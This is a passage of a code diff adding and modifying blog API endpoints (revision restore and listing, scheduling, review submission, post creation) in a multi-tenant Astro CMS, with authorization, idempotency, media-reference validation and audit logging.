+ * appends a *new* revision snapshotting that write (`createBlogRevision`),
+ * so `awcms_blog_revisions` stays append-only (module README §Skema
+ * data, point 5). High-risk mutation: requires `Idempotency-Key`.
+ */
+export const POST: APIRoute = async ({ request, params, cookies, locals }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+  const postId = params.id;
+  const revisionId = params.revisionId;
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!postId || !revisionId) {
+    return fail(
+      400,
+      "VALIDATION_ERROR",
+      "Post id and revision id are required."
+    );
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const idempotencyKey = request.headers.get("idempotency-key");
+
+  if (!idempotencyKey) {
+    return fail(
+      400,
+      "IDEMPOTENCY_REQUIRED",
+      "Idempotency-Key header is required."
+    );
+  }
+
+  const requestHash = computeRequestHash({
+    postId,
+    revisionId,
+    action: "restore"
+  });
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+  const correlationId = locals.correlationId;
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      RESTORE_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const existingIdempotency = await findIdempotencyRecord(
+      tx,
+      tenantId,
+      IDEMPOTENCY_SCOPE,
+      idempotencyKey
+    );
+
+    if (existingIdempotency) {
+      if (existingIdempotency.requestHash !== requestHash) {
+        return fail(
+          409,
+          "IDEMPOTENCY_CONFLICT",
+          "Idempotency-Key was already used with a different request."
+        );
+      }
+
+      return jsonResponse(existingIdempotency.responseBody, {
+        status: existingIdempotency.responseStatus
+      });
+    }
+
+    const post = await fetchBlogPostById(tx, tenantId, postId);
+
+    if (!post) {
+      return fail(404, "RESOURCE_NOT_FOUND", "Blog post not found.");
+    }
+
+    const revision = await fetchBlogRevisionById(
+      tx,
+      tenantId,
+      "post",
+      postId,
+      revisionId
+    );
+
+    if (!revision) {
+      return fail(404, "RESOURCE_NOT_FOUND", "Revision not found.");
+    }
+
+    // Issue #636 (security-auditor finding, PR #666 review): a revision can
+    // predate full-online R2-only mode being turned on for this tenant, or
+    // can reference a mediaObjectId that has since become unsafe (soft-
+    // deleted/orphaned) — restoring it must be re-validated exactly like a
+    // live PATCH would be, otherwise `revisions.restore` is a silent
+    // bypass of the very validation this issue exists to enforce. Revisions
+    // never snapshot `featuredMediaId` (see blog-post-directory.ts's
+    // revision-policy exclusion list), so only `contentJson` needs
+    // re-checking here.
+    const mediaReferenceValidation =
+      await validateNewsMediaReferencesForFullOnlineR2Mode(
+        tx,
+        tenantId,
+        {
+          featuredMediaId: undefined,
+          contentJson: revision.contentJson
+        },
+        noopNewsMediaPortAdapter
+      );
+
+    if (!mediaReferenceValidation.valid) {
+      return fail(
+        422,
+        "NEWS_MEDIA_REFERENCE_INVALID",
+        "This revision references image(s) that are not valid R2 media objects in full-online R2-only mode and cannot be restored.",
+        {},
+        mediaReferenceValidation.errors
+      );
+    }
+
+    // Issue #639 — same "restore must re-validate exactly like a live PATCH
+    // would" reasoning as the #636 comment above, extended to `video_news`
+    // blocks: (1) unconditional structural re-validation (a revision from
+    // before this issue existed cannot contain a `video_news` block at all,
+    // but this stays correct for any FUTURE revision that does), and (2)
+    // the R2-only-mode-gated thumbnail reference check.
+    const videoBlockValidation = validateAndNormalizeContentJsonVideoBlocks(
+      revision.contentJson
+    );
+
+    if (!videoBlockValidation.valid) {
+      return fail(
+        422,
+        "NEWS_MEDIA_REFERENCE_INVALID",
+        "This revision contains an invalid video_news block and cannot be restored.",
+        {},
+        videoBlockValidation.errors
+      );
+    }
+
+    const normalizedContentJson = videoBlockValidation.value;
+
+    const videoThumbnailValidation =
+      await validateVideoNewsThumbnailReferencesForFullOnlineR2Mode(
+        tx,
+        tenantId,
+        normalizedContentJson,
+        noopNewsMediaPortAdapter
+      );
+
+    if (!videoThumbnailValidation.valid) {
+      return fail(
+        422,
+        "NEWS_MEDIA_REFERENCE_INVALID",
+        "This revision references video thumbnail(s) that are not valid R2 media objects in full-online R2-only mode and cannot be restored.",
+        {},
+        videoThumbnailValidation.errors
+      );
+    }
+
+    const updated = await updateBlogPost(tx, tenantId, postId, {
+      title: revision.title,
+      contentJson: normalizedContentJson,
+      contentText: revision.contentText,
+      excerpt: revision.excerpt,
+      seoTitle: revision.seoTitle,
+      metaDescription: revision.metaDescription,
+      canonicalUrl: revision.canonicalUrl
+    });
+
+    if (!updated) {
+      return fail(404, "RESOURCE_NOT_FOUND", "Blog post not found.");
+    }
+
+    await createBlogRevision(
+      tx,
+      tenantId,
+      "post",
+      postId,
+      auth.context.tenantUserId,
+      {
+        title: updated.title,
+        contentJson: updated.contentJson,
+        contentText: updated.contentText,
+        excerpt: updated.excerpt,
+        seoTitle: updated.seoTitle,
+        metaDescription: updated.metaDescription,
+        canonicalUrl: updated.canonicalUrl,
+        status: updated.status
+      },
+      `Restored from revision ${revision.revisionNumber}.`,
+      correlationId
+    );
+
+    await recordAuditEvent(tx, {
+      tenantId,
+      actorTenantUserId: auth.context.tenantUserId,
+      moduleKey: "blog_content",
+      action: "blog.post.revision_restored",
+      resourceType: "blog_post",
+      resourceId: postId,
+      severity: "warning",
+      message: `Blog post restored from revision ${revision.revisionNumber}: ${updated.slug}.`,
+      attributes: { revisionId, revisionNumber: revision.revisionNumber },
+      correlationId
+    });
+
+    const successResponse = ok(updated);
+    const successBody = await successResponse.clone().json();
+
+    await saveIdempotencyRecord(
+      tx,
+      tenantId,
+      IDEMPOTENCY_SCOPE,
+      idempotencyKey,
+      requestHash,
+      200,
+      successBody
+    );
+
+    return successResponse;
+  });
+};

--- a/src/pages/api/v1/blog/posts/[id]/revisions/index.ts
+++ b/src/pages/api/v1/blog/posts/[id]/revisions/index.ts
@@ -1,0 +1,84 @@
+import type { APIRoute } from "astro";
+
+import { fail, ok } from "../../../../../../../modules/_shared/api-response";
+import { getDatabaseClient } from "../../../../../../../lib/database/client";
+import { withTenant } from "../../../../../../../lib/database/tenant-context";
+import {
+  authorizeInTransaction,
+  resolveAuthInputs
+} from "../../../../../../../modules/identity-access/application/access-guard";
+import { hashSessionToken } from "../../../../../../../lib/auth/session-token";
+import { fetchBlogPostById } from "../../../../../../../modules/blog-content/application/blog-post-directory";
+import { listBlogRevisions } from "../../../../../../../modules/blog-content/application/blog-revision-directory";
+
+const READ_GUARD = {
+  moduleKey: "blog_content",
+  activityCode: "revisions",
+  action: "read" as const
+};
+
+/**
+ * `GET /api/v1/blog/posts/{id}/revisions` (Issue #541). Requires
+ * `blog_content.revisions.read` — no ownership carve-out (unlike `PATCH
+ * .../{id}`, doc issue #541 §Permission Mapping lists this as a plain
+ * permission-gated read, not an ABAC-composed one). `?limit=` bounded
+ * (default 20, max 100), newest revision first.
+ */
+export const GET: APIRoute = async ({ request, params, cookies, url }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+  const postId = params.id;
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!postId) {
+    return fail(400, "VALIDATION_ERROR", "Post id is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const limitParam = url.searchParams.get("limit");
+  const limit = limitParam ? Number(limitParam) : undefined;
+
+  if (
+    limitParam !== null &&
+    (!Number.isFinite(limit) || (limit as number) < 1)
+  ) {
+    return fail(400, "VALIDATION_ERROR", "limit must be a positive number.");
+  }
+
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      READ_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const post = await fetchBlogPostById(tx, tenantId, postId, {
+      includeDeleted: true
+    });
+
+    if (!post) {
+      return fail(404, "RESOURCE_NOT_FOUND", "Blog post not found.");
+    }
+
+    const revisions = await listBlogRevisions(tx, tenantId, "post", postId, {
+      limit
+    });
+
+    return ok({ revisions });
+  });
+};

--- a/src/pages/api/v1/blog/posts/[id]/schedule.ts
+++ b/src/pages/api/v1/blog/posts/[id]/schedule.ts
@@ -35,7 +35,7 @@ import {
   checklistBlockersToErrorDetails,
   evaluateContentQualityChecklistForContent
 } from "../../../../../../modules/blog-content/application/content-quality-checklist-gate";
-import { noopNewsMediaPortAdapter } from "../../../../../../modules/blog-content/application/news-media-port-noop-adapter";
+import { newsMediaPortAdapter } from "../../../../../../modules/news-portal/application/news-media-port-adapter";
 
 const SCHEDULE_GUARD = {
   moduleKey: "blog_content",
@@ -161,7 +161,7 @@ export const POST: APIRoute = async ({ request, params, cookies, locals }) => {
       "post",
       post,
       termIds.length,
-      noopNewsMediaPortAdapter,
+      newsMediaPortAdapter,
       blogSettings.contentQualityChecklistPolicy,
       {
         scheduledAt,

--- a/src/pages/api/v1/blog/posts/[id]/schedule.ts
+++ b/src/pages/api/v1/blog/posts/[id]/schedule.ts
@@ -1,0 +1,251 @@
+import type { APIRoute } from "astro";
+
+import {
+  fail,
+  jsonResponse,
+  ok
+} from "../../../../../../modules/_shared/api-response";
+import { getDatabaseClient } from "../../../../../../lib/database/client";
+import { withTenant } from "../../../../../../lib/database/tenant-context";
+import {
+  authorizeInTransaction,
+  resolveAuthInputs
+} from "../../../../../../modules/identity-access/application/access-guard";
+import { hashSessionToken } from "../../../../../../lib/auth/session-token";
+import {
+  bodyTooLargeResponse,
+  readJsonBody
+} from "../../../../../../lib/security/request-body-limit";
+import { log } from "../../../../../../lib/logging/logger";
+import { recordAuditEvent } from "../../../../../../modules/logging/application/audit-log";
+import {
+  computeRequestHash,
+  findIdempotencyRecord,
+  saveIdempotencyRecord
+} from "../../../../../../modules/_shared/idempotency";
+import {
+  fetchBlogPostById,
+  transitionBlogPostStatus
+} from "../../../../../../modules/blog-content/application/blog-post-directory";
+import { isValidStatusTransition } from "../../../../../../modules/blog-content/domain/post-status";
+import { validateScheduleBlogPostInput } from "../../../../../../modules/blog-content/domain/blog-post-validation";
+import { fetchPostTermIds } from "../../../../../../modules/blog-content/application/blog-taxonomy-directory";
+import { fetchBlogSettings } from "../../../../../../modules/blog-content/application/blog-settings-directory";
+import {
+  checklistBlockersToErrorDetails,
+  evaluateContentQualityChecklistForContent
+} from "../../../../../../modules/blog-content/application/content-quality-checklist-gate";
+import { noopNewsMediaPortAdapter } from "../../../../../../modules/blog-content/application/news-media-port-noop-adapter";
+
+const SCHEDULE_GUARD = {
+  moduleKey: "blog_content",
+  activityCode: "posts",
+  action: "schedule" as const
+};
+
+const IDEMPOTENCY_SCOPE = "blog_post_schedule";
+
+/** `POST /api/v1/blog/posts/{id}/schedule` (Issue #538). Body: `{ scheduledAt: <ISO 8601 datetime, future> }`. High-risk mutation: requires `Idempotency-Key`. */
+export const POST: APIRoute = async ({ request, params, cookies, locals }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+  const postId = params.id;
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!postId) {
+    return fail(400, "VALIDATION_ERROR", "Post id is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const idempotencyKey = request.headers.get("idempotency-key");
+
+  if (!idempotencyKey) {
+    return fail(
+      400,
+      "IDEMPOTENCY_REQUIRED",
+      "Idempotency-Key header is required."
+    );
+  }
+
+  const bodyRead = await readJsonBody(request);
+
+  if (bodyRead.tooLarge) {
+    return bodyTooLargeResponse(bodyRead.limitBytes);
+  }
+
+  const validation = validateScheduleBlogPostInput(bodyRead.value);
+
+  if (!validation.valid) {
+    return fail(
+      400,
+      "VALIDATION_ERROR",
+      "Schedule input is invalid.",
+      {},
+      validation.errors
+    );
+  }
+
+  const { scheduledAt } = validation.value;
+  const requestHash = computeRequestHash({
+    postId,
+    action: "schedule",
+    scheduledAt: scheduledAt.toISOString()
+  });
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+  const correlationId = locals.correlationId;
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      SCHEDULE_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const existingIdempotency = await findIdempotencyRecord(
+      tx,
+      tenantId,
+      IDEMPOTENCY_SCOPE,
+      idempotencyKey
+    );
+
+    if (existingIdempotency) {
+      if (existingIdempotency.requestHash !== requestHash) {
+        return fail(
+          409,
+          "IDEMPOTENCY_CONFLICT",
+          "Idempotency-Key was already used with a different request."
+        );
+      }
+
+      return jsonResponse(existingIdempotency.responseBody, {
+        status: existingIdempotency.responseStatus
+      });
+    }
+
+    const post = await fetchBlogPostById(tx, tenantId, postId);
+
+    if (!post) {
+      return fail(404, "RESOURCE_NOT_FOUND", "Blog post not found.");
+    }
+
+    if (!isValidStatusTransition(post.status, "scheduled")) {
+      return fail(
+        409,
+        "INVALID_STATUS_TRANSITION",
+        `Cannot schedule a post in status "${post.status}".`
+      );
+    }
+
+    // Issue #640: same server-side content quality checklist gate as
+    // publish — scheduling is also a "publish state transition" the issue's
+    // security notes require validating before, not just at the moment the
+    // scheduled-publish worker later flips it to `published`.
+    const termIds = await fetchPostTermIds(tx, tenantId, postId);
+    const blogSettings = await fetchBlogSettings(tx, tenantId);
+    const checklist = await evaluateContentQualityChecklistForContent(
+      tx,
+      tenantId,
+      "post",
+      post,
+      termIds.length,
+      noopNewsMediaPortAdapter,
+      blogSettings.contentQualityChecklistPolicy,
+      {
+        scheduledAt,
+        socialPreviewFallback: {
+          tenantFallbackImageMediaId:
+            blogSettings.socialPreviewFallbackImageMediaId,
+          contentImageFallbackEnabled:
+            blogSettings.socialPreviewContentImageFallbackEnabled
+        }
+      }
+    );
+
+    if (!checklist.passed) {
+      await recordAuditEvent(tx, {
+        tenantId,
+        actorTenantUserId: auth.context.tenantUserId,
+        moduleKey: "blog_content",
+        action: "blog.post.schedule_blocked_by_checklist",
+        resourceType: "blog_post",
+        resourceId: postId,
+        severity: "warning",
+        message: `Blog post schedule blocked by content quality checklist: ${post.slug}.`,
+        attributes: {
+          blockedRuleIds: checklist.blockers.map((blocker) => blocker.ruleId)
+        },
+        correlationId
+      });
+
+      return fail(
+        422,
+        "CONTENT_QUALITY_CHECKLIST_BLOCKED",
+        "Scheduling is blocked by the content quality checklist.",
+        {},
+        checklistBlockersToErrorDetails(checklist)
+      );
+    }
+
+    const updated = await transitionBlogPostStatus(
+      tx,
+      tenantId,
+      postId,
+      "scheduled",
+      { scheduledAt }
+    );
+
+    if (!updated) {
+      return fail(404, "RESOURCE_NOT_FOUND", "Blog post not found.");
+    }
+
+    await recordAuditEvent(tx, {
+      tenantId,
+      actorTenantUserId: auth.context.tenantUserId,
+      moduleKey: "blog_content",
+      action: "blog.post.scheduled",
+      resourceType: "blog_post",
+      resourceId: postId,
+      severity: "info",
+      message: `Blog post scheduled: ${updated.slug}.`,
+      attributes: { scheduledAt: scheduledAt.toISOString() },
+      correlationId
+    });
+
+    log("info", "blog-content.post.scheduled", {
+      correlationId,
+      tenantId,
+      moduleKey: "blog_content",
+      postId,
+      slug: updated.slug,
+      scheduledAt: scheduledAt.toISOString()
+    });
+
+    const successResponse = ok({ ...updated, qualityChecklist: checklist });
+    const successBody = await successResponse.clone().json();
+
+    await saveIdempotencyRecord(
+      tx,
+      tenantId,
+      IDEMPOTENCY_SCOPE,
+      idempotencyKey,
+      requestHash,
+      200,
+      successBody
+    );
+
+    return successResponse;
+  });
+};

--- a/src/pages/api/v1/blog/posts/[id]/submit-review.ts
+++ b/src/pages/api/v1/blog/posts/[id]/submit-review.ts
@@ -1,0 +1,152 @@
+import type { APIRoute } from "astro";
+
+import { fail, ok } from "../../../../../../modules/_shared/api-response";
+import { getDatabaseClient } from "../../../../../../lib/database/client";
+import { withTenant } from "../../../../../../lib/database/tenant-context";
+import { hashSessionToken } from "../../../../../../lib/auth/session-token";
+import { log } from "../../../../../../lib/logging/logger";
+import { extractBearerToken } from "../../../../../../modules/identity-access/application/session-lookup";
+import {
+  fetchGrantedPermissionKeys,
+  resolveModuleEnabled,
+  resolveTenantContext
+} from "../../../../../../modules/identity-access/application/auth-context";
+import { recordDecisionLog } from "../../../../../../modules/identity-access/application/decision-log";
+import { recordAuditEvent } from "../../../../../../modules/logging/application/audit-log";
+import {
+  fetchBlogPostById,
+  transitionBlogPostStatus
+} from "../../../../../../modules/blog-content/application/blog-post-directory";
+import { evaluatePostUpdateAccess } from "../../../../../../modules/blog-content/domain/post-access-policy";
+import { isValidStatusTransition } from "../../../../../../modules/blog-content/domain/post-status";
+
+const ACTIVITY = { moduleKey: "blog_content", activityCode: "posts" };
+
+/**
+ * `POST /api/v1/blog/posts/{id}/submit-review` (Issue #538). Guard maps to
+ * `blog_content.posts.update` (doc issue #538 §Permission Mapping) — same
+ * `evaluatePostUpdateAccess` ownership rule as `PATCH .../{id}` applies, so
+ * a draft's own author can submit it for review without needing the
+ * broader update permission. Not idempotency-gated (not listed under doc
+ * issue #538 §Idempotency Requirements) — the underlying status-transition
+ * write is naturally idempotent (same status in, same status out).
+ */
+export const POST: APIRoute = async ({ request, params, locals }) => {
+  const tenantId = request.headers.get("x-awcms-tenant-id");
+  const postId = params.id;
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!postId) {
+    return fail(400, "VALIDATION_ERROR", "Post id is required.");
+  }
+
+  const token = extractBearerToken(request.headers.get("authorization"));
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+  const correlationId = locals.correlationId;
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const context = await resolveTenantContext(tx, tenantId, tokenHash, now);
+
+    if (!context) {
+      return fail(401, "AUTH_REQUIRED", "Session is invalid or expired.");
+    }
+
+    const moduleEnabled = await resolveModuleEnabled(
+      tx,
+      tenantId,
+      "blog_content"
+    );
+
+    if (!moduleEnabled) {
+      return fail(
+        403,
+        "MODULE_DISABLED",
+        "Module is disabled for this tenant."
+      );
+    }
+
+    const post = await fetchBlogPostById(tx, tenantId, postId);
+
+    if (!post) {
+      return fail(404, "RESOURCE_NOT_FOUND", "Blog post not found.");
+    }
+
+    const grantedPermissionKeys = await fetchGrantedPermissionKeys(
+      tx,
+      tenantId,
+      context.tenantUserId
+    );
+    const decision = evaluatePostUpdateAccess(context, grantedPermissionKeys, {
+      authorTenantUserId: post.authorTenantUserId,
+      status: post.status
+    });
+
+    await recordDecisionLog(
+      tx,
+      tenantId,
+      context.tenantUserId,
+      {
+        ...ACTIVITY,
+        action: "update",
+        resourceType: "blog_post",
+        resourceId: postId
+      },
+      decision
+    );
+
+    if (!decision.allowed) {
+      return fail(403, "ACCESS_DENIED", decision.reason);
+    }
+
+    if (!isValidStatusTransition(post.status, "review")) {
+      return fail(
+        409,
+        "INVALID_STATUS_TRANSITION",
+        `Cannot submit a post in status "${post.status}" for review.`
+      );
+    }
+
+    const updated = await transitionBlogPostStatus(
+      tx,
+      tenantId,
+      postId,
+      "review"
+    );
+
+    if (!updated) {
+      return fail(404, "RESOURCE_NOT_FOUND", "Blog post not found.");
+    }
+
+    await recordAuditEvent(tx, {
+      tenantId,
+      actorTenantUserId: context.tenantUserId,
+      moduleKey: "blog_content",
+      action: "blog.post.submitted_for_review",
+      resourceType: "blog_post",
+      resourceId: postId,
+      severity: "info",
+      message: `Blog post submitted for review: ${updated.slug}.`,
+      correlationId
+    });
+
+    log("info", "blog-content.post.submitted-for-review", {
+      correlationId,
+      tenantId,
+      moduleKey: "blog_content",
+      postId,
+      slug: updated.slug
+    });
+
+    return ok(updated);
+  });
+};

--- a/src/pages/api/v1/blog/posts/index.ts
+++ b/src/pages/api/v1/blog/posts/index.ts
@@ -25,7 +25,7 @@ import {
 import { setPostTranslationGroup } from "../../../../../modules/blog-content/application/localized-content-directory";
 import { validateNewsMediaReferencesForFullOnlineR2Mode } from "../../../../../modules/blog-content/application/news-media-reference-gate";
 import { validateVideoNewsThumbnailReferencesForFullOnlineR2Mode } from "../../../../../modules/blog-content/application/video-news-thumbnail-reference-gate";
-import { noopNewsMediaPortAdapter } from "../../../../../modules/blog-content/application/news-media-port-noop-adapter";
+import { newsMediaPortAdapter } from "../../../../../modules/news-portal/application/news-media-port-adapter";
 import { validateCreateBlogPostInput } from "../../../../../modules/blog-content/domain/blog-post-validation";
 import { validateAndNormalizeContentJsonVideoBlocks } from "../../../../../modules/blog-content/domain/video-news-block-validation";
 import {
@@ -203,7 +203,7 @@ export const POST: APIRoute = async ({ request, cookies, locals }) => {
           seoImageMediaId: input.seoImageMediaId,
           contentJson: input.contentJson
         },
-        noopNewsMediaPortAdapter
+        newsMediaPortAdapter
       );
 
     if (!mediaReferenceValidation.valid) {
@@ -224,7 +224,7 @@ export const POST: APIRoute = async ({ request, cookies, locals }) => {
         tx,
         tenantId,
         input.contentJson,
-        noopNewsMediaPortAdapter
+        newsMediaPortAdapter
       );
 
     if (!videoThumbnailValidation.valid) {

--- a/src/pages/api/v1/blog/posts/index.ts
+++ b/src/pages/api/v1/blog/posts/index.ts
@@ -1,0 +1,298 @@
+import type { APIRoute } from "astro";
+
+import { fail, ok } from "../../../../../modules/_shared/api-response";
+import { getDatabaseClient } from "../../../../../lib/database/client";
+import { withTenant } from "../../../../../lib/database/tenant-context";
+import {
+  authorizeInTransaction,
+  resolveAuthInputs
+} from "../../../../../modules/identity-access/application/access-guard";
+import { hashSessionToken } from "../../../../../lib/auth/session-token";
+import {
+  bodyTooLargeResponse,
+  readJsonBody
+} from "../../../../../lib/security/request-body-limit";
+import { log } from "../../../../../lib/logging/logger";
+import { recordAuditEvent } from "../../../../../modules/logging/application/audit-log";
+import {
+  createBlogPost,
+  listBlogPosts
+} from "../../../../../modules/blog-content/application/blog-post-directory";
+import {
+  countExistingTerms,
+  syncPostTermAssignments
+} from "../../../../../modules/blog-content/application/blog-taxonomy-directory";
+import { setPostTranslationGroup } from "../../../../../modules/blog-content/application/localized-content-directory";
+import { validateNewsMediaReferencesForFullOnlineR2Mode } from "../../../../../modules/blog-content/application/news-media-reference-gate";
+import { validateVideoNewsThumbnailReferencesForFullOnlineR2Mode } from "../../../../../modules/blog-content/application/video-news-thumbnail-reference-gate";
+import { noopNewsMediaPortAdapter } from "../../../../../modules/blog-content/application/news-media-port-noop-adapter";
+import { validateCreateBlogPostInput } from "../../../../../modules/blog-content/domain/blog-post-validation";
+import { validateAndNormalizeContentJsonVideoBlocks } from "../../../../../modules/blog-content/domain/video-news-block-validation";
+import {
+  isBlogContentStatus,
+  type BlogContentStatus
+} from "../../../../../modules/blog-content/domain/post-status";
+
+const READ_GUARD = {
+  moduleKey: "blog_content",
+  activityCode: "posts",
+  action: "read" as const
+};
+
+const CREATE_GUARD = {
+  moduleKey: "blog_content",
+  activityCode: "posts",
+  action: "create" as const
+};
+
+/** `GET /api/v1/blog/posts` (Issue #538) — list this tenant's non-deleted posts, `?status=` optional filter, `?limit=` bounded (default 20, max 100). */
+export const GET: APIRoute = async ({ request, cookies, url }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const statusParam = url.searchParams.get("status");
+  let status: BlogContentStatus | undefined;
+
+  if (statusParam !== null) {
+    if (!isBlogContentStatus(statusParam)) {
+      return fail(
+        400,
+        "VALIDATION_ERROR",
+        "status must be one of draft, review, scheduled, published, archived."
+      );
+    }
+
+    status = statusParam;
+  }
+
+  const limitParam = url.searchParams.get("limit");
+  const limit = limitParam ? Number(limitParam) : undefined;
+
+  if (
+    limitParam !== null &&
+    (!Number.isFinite(limit) || (limit as number) < 1)
+  ) {
+    return fail(400, "VALIDATION_ERROR", "limit must be a positive number.");
+  }
+
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      READ_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const posts = await listBlogPosts(tx, tenantId, {
+      status,
+      limit
+    });
+
+    return ok({ posts });
+  });
+};
+
+/** `POST /api/v1/blog/posts` (Issue #538) — create a draft post. Not idempotent (recommended, not required, per doc issue #538 §Idempotency Requirements) — a network retry duplicating a create is caught by the `(tenant_id, locale, slug)` partial unique index, same reasoning `POST /api/v1/email/templates` documents. */
+export const POST: APIRoute = async ({ request, cookies, locals }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const bodyRead = await readJsonBody(request, "large");
+
+  if (bodyRead.tooLarge) {
+    return bodyTooLargeResponse(bodyRead.limitBytes);
+  }
+
+  const validation = validateCreateBlogPostInput(bodyRead.value);
+
+  if (!validation.valid) {
+    return fail(
+      400,
+      "VALIDATION_ERROR",
+      "Blog post is invalid.",
+      {},
+      validation.errors
+    );
+  }
+
+  const input = validation.value;
+
+  // Issue #639 — unconditional (not R2-only-mode-gated), pure structural
+  // validation/normalization of any `video_news` blocks in `contentJson`:
+  // provider allowlist, videoId format/normalization. Runs before
+  // `withTenant` since it needs no database access.
+  const videoBlockValidation = validateAndNormalizeContentJsonVideoBlocks(
+    input.contentJson
+  );
+
+  if (!videoBlockValidation.valid) {
+    return fail(
+      400,
+      "VALIDATION_ERROR",
+      "Blog post is invalid.",
+      {},
+      videoBlockValidation.errors
+    );
+  }
+
+  input.contentJson = videoBlockValidation.value;
+
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+  const correlationId = locals.correlationId;
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      CREATE_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    if (input.termIds && input.termIds.length > 0) {
+      const existingCount = await countExistingTerms(
+        tx,
+        tenantId,
+        input.termIds
+      );
+
+      if (existingCount !== input.termIds.length) {
+        return fail(
+          400,
+          "VALIDATION_ERROR",
+          "termIds contains an id that does not exist for this tenant."
+        );
+      }
+    }
+
+    const mediaReferenceValidation =
+      await validateNewsMediaReferencesForFullOnlineR2Mode(
+        tx,
+        tenantId,
+        {
+          featuredMediaId: input.featuredMediaId,
+          seoImageMediaId: input.seoImageMediaId,
+          contentJson: input.contentJson
+        },
+        noopNewsMediaPortAdapter
+      );
+
+    if (!mediaReferenceValidation.valid) {
+      return fail(
+        422,
+        "NEWS_MEDIA_REFERENCE_INVALID",
+        "One or more image references are not valid R2 media objects in full-online R2-only mode.",
+        {},
+        mediaReferenceValidation.errors
+      );
+    }
+
+    // Issue #639 — mode-gated (same as above): a `video_news` block's
+    // optional `thumbnailMediaObjectId`, when present, must be a verified
+    // same-tenant R2 media object in full-online R2-only mode.
+    const videoThumbnailValidation =
+      await validateVideoNewsThumbnailReferencesForFullOnlineR2Mode(
+        tx,
+        tenantId,
+        input.contentJson,
+        noopNewsMediaPortAdapter
+      );
+
+    if (!videoThumbnailValidation.valid) {
+      return fail(
+        422,
+        "NEWS_MEDIA_REFERENCE_INVALID",
+        "One or more video thumbnail references are not valid R2 media objects in full-online R2-only mode.",
+        {},
+        videoThumbnailValidation.errors
+      );
+    }
+
+    let post;
+
+    try {
+      post = await createBlogPost(
+        tx,
+        tenantId,
+        auth.context.tenantUserId,
+        input
+      );
+    } catch (error) {
+      const message = error instanceof Error ? error.message : String(error);
+
+      if (message.includes("awcms_blog_posts_slug_dedup")) {
+        return fail(
+          409,
+          "SLUG_CONFLICT",
+          `A post already exists for slug "${input.slug}" in locale "${input.locale}".`
+        );
+      }
+
+      throw error;
+    }
+
+    if (input.termIds) {
+      await syncPostTermAssignments(tx, tenantId, post.id, input.termIds);
+    }
+
+    if (input.translationGroupId) {
+      await setPostTranslationGroup(
+        tx,
+        tenantId,
+        post.id,
+        input.translationGroupId
+      );
+    }
+
+    await recordAuditEvent(tx, {
+      tenantId,
+      actorTenantUserId: auth.context.tenantUserId,
+      moduleKey: "blog_content",
+      action: "blog.post.created",
+      resourceType: "blog_post",
+      resourceId: post.id,
+      severity: "info",
+      message: `Blog post created: ${post.slug}.`,
+      correlationId
+    });
+
+    log("info", "blog-content.post.created", {
+      correlationId,
+      tenantId,
+      moduleKey: "blog_content",
+      postId: post.id,
+      slug: post.slug
+    });
+
+    return ok({ ...post, termIds: input.termIds ?? [] });
+  });
+};

--- a/src/pages/api/v1/blog/search/index.ts
+++ b/src/pages/api/v1/blog/search/index.ts
@@ -1,0 +1,115 @@
+import type { APIRoute } from "astro";
+
+import { fail, ok } from "../../../../../modules/_shared/api-response";
+import { getDatabaseClient } from "../../../../../lib/database/client";
+import { withTenant } from "../../../../../lib/database/tenant-context";
+import {
+  authorizeInTransaction,
+  resolveAuthInputs
+} from "../../../../../modules/identity-access/application/access-guard";
